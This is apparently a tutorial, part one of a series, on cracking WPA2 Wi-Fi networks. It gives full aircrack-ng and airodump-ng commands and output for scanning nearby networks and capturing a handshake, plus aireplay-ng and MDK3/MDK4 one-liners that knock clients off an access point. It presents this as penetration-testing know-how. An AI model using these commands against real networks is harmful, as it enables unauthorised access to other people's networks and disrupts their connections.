Wireless Penetration Testing
It has been 122 years since Nicola Tesla amazed the crowd at New York's Madison Square Garden, with a wirelessly operated boat which listened to commands coming out of thin air. Back in 1898, when even electricity alone seemed like magic to unaccustomed spectator, mysterious genius must have looked like a dark sorcerer of a kind, while remotely operating his little boat.
If there is an ability that stands out of Mr. Tesla’s bag of tricks, it is definitely the ability to be grossly ahead of its time, this is where he always shined the most - so it took humanity more than half a century to get in sync with his tune, but alright, as they say - better late than never.
Today, wireless technologies he introduced us to, play a central role in all our devices, we are integrating connectivity not just into smartphones, but also into self-driven cars, air-conditioning systems, refrigerators, electrical ovens, we even coined the term smart-homes for IOT connected houses!
The ability to connect devices without physical access to them, also makes it hard to control who has that access. In this tutorial, we will go through various methods of gaining access to protected wireless networks, which will give you the needed know-how that will help you to set up your wireless environment as secure as possible.
Due to the open nature of Linux, there are loads of ready made Linux distributions out there, whose sole purpose is penetration testing, and among them there are a few specialized in wireless field.
One of the most feature rich among them is spanish WifiSlax (it has English version builtin), based on Slackware Linux. It’s gentle learning curve makes it the best choice for those with no experience in this field, and it’s easy to use KDE graphical interface is something that newcomers from Windows world will definitely know how to appreciate. It contains loads of tools such as: Wifite, Handshaker, Cowpatty, Pyrit, Fern Wifi Cracker, Bully, PixieScript, Hashcat and so on, which make the whole process of capturing and cracking handshakes and PMKID’s a matter of a few clicks. Arm it with a good wordlist and it will get you going in no time. If this sounds intriguing enough for you, download it from their website, put it onto large enough USB flash stick (2 GB or larger) with Rufus, and you’ll start in no time.
Ex Backtrack, or todays Kali Linux as usual also has you covered with it’s wireless tools section. Offensive Security, people behind Kali Linux, are doing their best to keep Kali a sort of standard for everything related to penetration testing, and wireless is no exception.
In this tutorial, we will however concentrate on the manual way, because knowing how things actually work under the hood will give you an enormous advantage in the future. Any Linux distribution with aircrack and Hashcat will do, but we will get to that part later on.
WPA2 Networks Cracking
WPA2 (Wi-Fi Protected Access) protocol, based on the IEEE 802.11i data encryption technology standard, is developed by Wi-Fi Alliance, the non-profit organization that promotes Wi-Fi technology and certifies Wi-Fi products. It is in wide use since 2006 and is here to stay until WPA3 replaces it in the future.
4-Way-Handshake Cracking Method
Still the most widely used way to crack a WPA/WPA2 network is by cracking a captured 4-way-handshake, which you take while your wireless card is in monitoring mode. To get into this mode, airmon-ng application is used (airmon-ng is a part of the aircrack-ng collection). Once the handshake is captured, Hashcat application is used, together with a good wordlist, to crack the password. Hashcat is an awesome application which uses the power of the GPU (it can use CPU as well) to crack the password.
Summarization of this method:
- Wireless card is put into monitoring mode, which enables it to listen to all wireless communication, instead of just communicating with the associated access point
- Surrounding wireless communication is monitored and exchanged 4-way-handshakes are captured. To speed things up, aireplay-ng or MDK3/4 attacks can be used to disassociate existing clients from their access points, forcing them to authenticate again, so we can capture the handshake
- Good wordlists are picked from the Internet or generated with various software applications such as Crunch
- Handshakes are then most often cracked with Hashcat or cracked with aircrack-ng application
So, to begin, we will first install Aircrack-ng. Aircrack is a whole suite of applications, intended for wireless networks cracking, developed by Thomas d'Otreppe de Bouvette.
As good old Wikipedia says: Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs..
How to install Aircrack From Source On Linux
As written on the developers website, you can install aircrack-ng from source, by doing the following:
wget https://download.aircrack-ng.org/aircrack-ng-1.5.2.tar.gz tar -zxvf aircrack-ng-1.5.2.tar.gz cd aircrack-ng-1.5.2 autoreconf -i --with-experimental make make install ldconfig
This will download the latest version of the software and install it with all it’s features.
How to install aircrack using Linux package manager
Of course, you can also use your distribution's package manager to download and install Aircrack, but doing it that way doesn’t guarantee you have all it’s latest features.
On Debian based systems you can install it with a simple:
sudo apt install aircrack-ng
How to find name of wireless adapter on Linux
Once we have Aircrack installed, it is time to put our wireless card into monitoring mode. Aircrack uses airmon-ng application for this, but first we need to know the exact name of our wireless adapter, and we also need to kill all potentially conflicting processes. We can find the name of the card with:
sudo iwconfig output: histerix@box:~$ sudo iwconfig wlp12s0 Mode:Managed Frequency:2.462 GHz Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=70/70 Signal level=-37 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:63 Missed beacon:0 lo no wireless extensions. enp9s0 no wireless extensions.
As we can see, our wireless card is called wlp12s0. What we need to do now is to stop the processes that may interfere with our work, by issuing:
sudo airmon-ng check kill Output: [email protected]:~$ sudo airmon-ng check kill Killing these processes: PID Name 863 wpa_supplicant
We can now safely proceed by issuing the following command:
sudo airmon-ng start wlp12s0 output: [email protected]:~$ sudo airmon-ng start wlp12s0 PHY Interface Driver Chipset phy0 wlp12s0mon ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
Finally, our card is in monitoring mode, it is now called wlp12s0mon, and it’s time to capture some handshakes. Run just airodump first to check on which channel is the network we want to crack, by issuing the following command:
sudo airodump-ng wlp12s0mon output: [email protected]:~/Desktop/captures$ sudo airodump-ng wlp12s0mon CH 8 ][ Elapsed: 6 s ][ 2020-01-19 22:18 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 0c:9a:54:0b:b2:e5 -29 40 576 42 6 130 WPA2 CCMP PSK ad1b70 D8:97:BA:44:17:40 -70 8 0 0 1 130 WPA2 CCMP PSK Tamara 0E:54:A5:38:8C:82 -74 46 0 0 6 130 WPA2 CCMP MGT UniFi 0C:54:A5:38:8C:80 -73 48 52 24 6 130 WPA2 CCMP PSK Pizza Net DA:97:BA:44:17:42 -71 8 0 0 1 130 WPA2 CCMP MGT UniFi 5C:76:95:80:57:21 -75 6 0 0 1 130 WPA2 CCMP PSK Kiki 74:40:BB:A2:D3:E5 -74 23 0 0 6 130 WPA2 CCMP PSK A2D3DF B4:2A:0E:6B:1D:E9 -76 5 0 0 1 130 WPA2 CCMP PSK Timmy D6:5D:DF:12:9B:21 -72 1 0 0 9 130 WPA2 CCMP MGT UniFi 7C:05:07:63:4C:FF -77 1 0 0 1 130 WPA2 CCMP PSK e55dd8 10:05:01:4E:B8:BC -75 2 0 0 11 130 WPA2 CCMP PSK Splicmen 34:69:87:BE:AB:8D -76 5 2 0 13 130 WPA2 CCMP PSK ZTE_BEAB8D 76:40:BB:A2:D2:E6 -74 34 0 0 6 130 WPA2 CCMP MGT UniFi 04:D9:F5:22:F9:81 -80 3 0 0 10 360 WPA2 CCMP PSK Medici 20:E8:82:B0:DD:56 -80 3 0 0 4 130 WPA2 CCMP PSK ZTE_H168NB0DD56 72:54:D2:C7:33:E6 -81 3 0 0 2 130 WPA2 CCMP MGT UniFi 34:DA:B7:B0:64:1B -81 2 0 0 3 130 WPA2 CCMP PSK ZTE_H168NB0641B 4A:5F:99:39:20:40 -86 19 0 0 6 130 WPA2 CCMP MGT UniFi
In this tutorial, we will try to capture the handshake of ad1b70 network, whose BSSID is 0c:9a:54:0b:b2:e5.
As can be seen in the output above, this network is on channel number 6, so this is the channel we will monitor.
We will now run the same command again, this time adding the channel number, BSSID of the network we are attacking, and the path where we want airodump to save the captures:
sudo airodump-ng -c 6 --bssid 0c:9a:54:0b:b2:e5 -w /home/histerix/captures wlp12s0mon output: [email protected]:~$ sudo airodump-ng -c 6 --bssid 0c:9a:54:0b:b2:e5 -w /home/histerix/captures wlp12s0mon CH 6 ][ Elapsed: 1 min ][ 2020-01-19 22:33 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 0c:9a:54:0b:b2:e5 -52 62 711 1192 1 6 130 WPA2 CCMP PSK ad1b70 BSSID STATION PWR Rate Lost Frames Probe 0c:9a:54:0b:b2:e5 0C:FF:8A:23:B7:0F -44 0e- 1 0 916 0c:9a:54:0b:b2:e5 50:C8:E5:DA:7B:F1 -88 0e- 1 19492 2942
Do not close the terminal window, leave it running and open a new terminal window or a new terminal tab.
In this window, we will de-authenticate existing clients with the help of aireplay tool.
For this we need the MAC address of at least one connected client, which we can find in the previous terminal window.
As we can see at the bottom there, there are two clients connected to the access point, with MAC addresses 50:C8:E5:DA:7B:F1 and 0C:FF:8A:23:B7:0F.
We will pick one and issue the following command:
sudo aireplay-ng -0 5 -a 0c:9a:54:0b:b2:e5 -c 0C:FF:8A:23:B7:0F wlp12s0mon
This will send de-authentication command five consecutive times, and will try to kick the client with MAC address 0C:FF:8A:23:B7:0F from the access point on 0c:9a:54:0b:b2:e5.
[email protected]:~$ sudo aireplay-ng -0 5 -a 0c:9a:54:0b:b2:e5 -c 0C:FF:8A:23:B7:0F wlp12s0mon 22:31:59 Waiting for beacon frame (BSSID: 0c:9a:54:0b:b2:e5) on channel 6 22:32:00 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 9|66 ACKs] 22:32:00 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 5|56 ACKs] 22:32:01 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [10|68 ACKs] 22:32:02 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [ 0|62 ACKs] 22:32:02 Sending 64 directed DeAuth (code 7). STMAC: [0C:FF:8A:23:B7:0F] [54|66 ACKs]
If we succeed, at the top right side of the first terminal window we should receive the good news:
CH 6 ][ Elapsed: 1 min ][ 2020-01-19 22:53 ][ WPA handshake: 0c:9a:54:0b:b2:e5 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 0c:9a:54:0b:b2:e5 -42 74 614 365 1 6 130 WPA2 CCMP PSK ad1b70 BSSID STATION PWR Rate Lost Frames Probe 0c:9a:54:0b:b2:e5 0C:FF:8A:23:B7:0F -32 0e- 1 0 1665 0c:9a:54:0b:b2:e5 50:C8:E5:DA:7B:F1 -77 0e- 1 26712 1347
If nothing happens, wait half a minute and repeat the same command. Doing this a couple of times should disconnect the client from the access point, if we are close enough and the signal is decent.
Apart from de-authentication with aireplay, you can also try to use MDK3/MDK4 attack in the third window. MDK is an excellent little software which sends both de-authentication and de-association and can in some situations be more efficient than aireplay.
You can install it easily from your software repository, with:
sudo apt-get install mdk4
There are several ways you can use MDK in a scenario such as ours.
You could just use a one-liner such as this one with MDK4:
[email protected]:~$ mdk4 wlp12s0mon b -a 0c:9a:54:0b:b2:e5
or you can create a simple text file with MAC addresses of several access points and hit them all at once. Name this file any way you want (for example targets.txt) and then run it like this:
[email protected]:~$ mdk3 wlp12s0mon d b targets.txt -c 6
Do not get confused with the lack of output, MDK is doing it’s thing in the background, quietly but effectively, so just leave the window open and go back to the first terminal window and watch the situation unfolds.
You will see that suddenly there are many new, fake clients trying to connect to the access point, in an attempt to knock it down, forcing all clients to reconnect.
MDK attack works bit slower than aireplay, but in a few minutes you should see the results. Please also note that the access point might suddenly change the channel it uses, and in that case adjust your airodump and MDK commands, restarting them on the new channel, keeping the dump running all the time. There are certain small differences between version 3 and 4 so just check them by appending --help, it is nicely documented and you’ll be up and running quickly.
So we got the handshake! What now?
Part 2 - Cracking Wireless Networks With Kali